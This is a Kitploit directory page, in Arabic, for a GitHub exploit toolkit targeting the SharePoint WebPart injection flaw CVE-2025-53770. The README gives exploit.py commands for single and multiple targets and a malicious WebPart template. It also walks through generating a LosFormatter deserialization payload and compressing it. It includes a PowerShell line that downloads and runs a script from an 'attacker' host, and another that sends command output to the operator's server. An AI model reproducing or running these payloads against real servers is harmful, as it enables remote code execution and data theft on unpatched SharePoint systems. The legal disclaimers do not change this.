Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-53770-Exploit — أداة استغلال حقن WebPart في SharePoint | Kitploit
أدوات/GitHubGitHub/soltanali0/cve-2025-53770-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubsoltanali0/cve-2025-53770-exploit

CVE-2025-53770-Exploit

أداة استغلال حقن WebPart في SharePoint

عرض المستودع
313773منذ 9 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📌 مجموعة أدوات استغلال حقن WebPart في SharePoint

🍕 أداة استغلال لثغرة حقن WebPart في SharePoint عبر ToolPane.aspx، مما يؤدي إلى إلغاء تسلسل .NET وإمكانية تنفيذ تعليمات برمجية عن بُعد (RCE).

طوّرها: @GOTOCVE


🌍 نظرة عامة

تستغل هذه الأداة ثغرة أمنية في Microsoft SharePoint (محليًا On-Premises) تسمح للمستخدمين المُصادقين بإساءة استخدام نقطة النهاية ToolPane.aspx وحقن WebParts خبيثة تحتوي على كائنات .NET متسلسلة مضغوطة بصيغة GZIP.

يتم وضع الكائن المحقون داخل المُعامِل MSOTlPn_SelectedWpId ودمجه في WebPart مزيف (مثل <Scorecard:ExcelDataSet>) يتم تحليله وإلغاء تسلسله بواسطة خادم SharePoint الخلفي.


⚙️ الميزات

  • ✅ تحقق تلقائي من نقطة النهاية (ToolPane.aspx)
  • ✅ حقن الحمولات التي يقدمها المستخدم (كائنات .NET LosFormatter بترميز GZIP+Base64)
  • ✅ دعم الوكيل (Proxy) لـ Burp/ZAP
  • ✅ دعم إدخال الحمولة من ملف أو مباشرة كنص

🧪 الإصدارات المدعومة

المنتجالإصدارات المتأثرة
SharePoint Server 201616.0.4351.1000 - 16.0.5508.1000
SharePoint Server 201916.0.10337.12109 - 16.0.10417.20027

⚡ ملخص الثغرة

الحقلالقيمة
المكوّنMicrosoft SharePoint (On-Premises)
نقطة النهاية/layouts/15/ToolPane.aspx
المُعامِلMSOTlPn_DWP
WebPart<Scorecard:ExcelDataSet CompressedDataTable>
المشكلةإلغاء تسلسل .NET غير آمن
CVECVE-2025-53770

🧰 مكونات المجموعة

✅ 1. exploit.py

أداة استغلال SharePoint متعددة الخيوط لثغرة CVE-2025-53770.

  • يكتشف SharePoint وإصداره
  • يتحقق من الوصول إلى /ToolPane.aspx
  • يرسل حمولة WebPart الخبيثة

✅ 2. YSLosf.exe

مولّد حمولات LosFormatter وأداة إلغاء تسلسل.

image

🚀 طريقة الاستخدام

🔸 الاستخدام الأساسي

root@kitploit:~
python3 exploit.py -u https://target -p payload.txt

🔸 أهداف متعددة

root@kitploit:~
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080

🔸 جميع الوسائط

الوسيطالوصف
-uرابط الهدف (مثل: https://sp.company.local)
-fملف يحتوي على روابط الأهداف (رابط واحد في كل سطر)
-pملف الحمولة أو سلسلة Base64 GZIP مباشرة
--proxyوكيل اختياري (مثل: http://127.0.0.1:8080)
-tمهلة الانتظار بالثواني (الافتراضي: 15)

🔧 المتطلبات

  • Python 3.10
  • تثبيت التبعيات:
root@kitploit:~
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  • بيئة تشغيل .NET 4.8 (لتشغيل YSLosf.exe)

💥 بنية الحمولة

يجب أن تكون حمولتك:

  1. كائن .NET (مثل DataSet أو ObjectDataProvider)
  2. مُسلسل باستخدام LosFormatter أو BinaryFormatter
  3. مُرمّز بـ Base64
  4. مضغوط بصيغة GZIP

مضمّنة في WebPart مثل:

root@kitploit:~
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>

🛠 توليد الحمولات باستخدام YSLosf

الخطوة 1: إنشاء ملف الحمولة

ضع أمرك (مثل: قشرة عكسية) في payload.txt:

root@kitploit:~
powershell -nop -c iwr http://attacker/shell.ps1 | iex

الخطوة 2: توليد حمولة Base64

root@kitploit:~
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc

الخطوة 3: الضغط والإنهاء

root@kitploit:~
# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)

احفظ المخرجات في payload-final.txt ومررها إلى أداة الاستغلال.


🧵 سلاسل الأدوات (Gadget Chains) المدعومة

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Windows.Data.ObjectDataProvider
  • System.Web.UI.LosFormatter

📡 ملاحظات حول مخرجات الأوامر

هذه الثغرة لا تُرجع أي مخرجات (مثل: ipconfig) في الاستجابة. يجب عليك:

  • استخدام حمولات قشرة عكسية
  • أو استخراج المخرجات:
root@kitploit:~
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"

⚠️ إخلاء مسؤولية قانوني

هذه الأداة مُقدمة لأغراض تعليمية واختبارات أمنية مُصرّح بها فقط.

لا تستخدمها ضد أنظمة بدون إذن صريح. سوء الاستخدام قد يكون غير قانوني وغير أخلاقي.


🔍 الاكتشاف

إذا قبل الخادم الضعيف الحمولة وأعاد MSOTlPn_SelectedWpId أو عرض الصفحة مع WebPart المحقون، فمن المحتمل أن تكون الثغرة قابلة للاستغلال. عدم وجود مخرجات يعني أن إلغاء التسلسل فشل أو أن الخادم تم تحديثه (Patched).


🛑 توضيح قانوني ونطاق هذه الأداة

هذه الأداة لا تقوم بتسليم أو تنفيذ أي شيلكود أو ويب شيل (Web Shell). إنها توضح فقط استغلال ثغرة إلغاء تسلسل .NET (CVE-2025-53770) عبر نقطة النهاية الضعيفة ToolPane.aspx باستخدام بنية WebPart خبيثة تحتوي على كائن .NET مضغوط بصيغة GZIP.

🔹 الغرض: مساعدة الباحثين وأعضاء فرق الاختراق (Red Team) وفرق الدفاع (Blue Team) في اكتشاف خوادم SharePoint الضعيفة واختبار متجه الحقن بأمان باستخدام حمولات مخصصة.

🔹 الحمولات: تتطلب الأداة من المستخدمين توليد حمولاتهم الخاصة (مثل: استخدام YSLosf.exe) والتي يتم تضمينها في WebPart كسلاسل GZIP بترميز Base64.
تقع على عاتق المستخدم مسؤولية اختيار حمولات مناسبة وأخلاقية (مثل: تنفيذ calc.exe غير الضار، أو إشارات Beacon، وما إلى ذلك).

🔹 لا توجد قشور عكسية/ويب شيلات مضمّنة:
بينما قد يقوم المهاجمون في البرية بإسقاط ويب شيلات مثل spinstall0.aspx، هذا المشروع لا يتضمن أي منطق من هذا القبيل.
إذا كنت تخطط لتسليم قشرة عكسية، فيجب عليك توليد حمولتك الخاصة يدويًا وتحمل المسؤولية الكاملة عن استخدامها.

سجل النجوم

Star History Chart

📢 المزيد من الاستغلالات و CVEs؟

انضم إلى @GOTOCVE على تيليجرام:

  • 🔍 تحليلات أسبوعية لثغرات CVE
  • 🧠 كتابات معمّقة عن الاستغلالات
  • 🛡 محتوى لفرق الأحمر والأزرق
  • 💣 PoCs حقيقية ونصائح للاكتشاف

📬 التواصل

أُنشئت بواسطة Ali Soltani
للاستفسارات البحثية أو الإبلاغ عن أخطاء، راسلنا عبر تيليجرام

تنزيل الأداة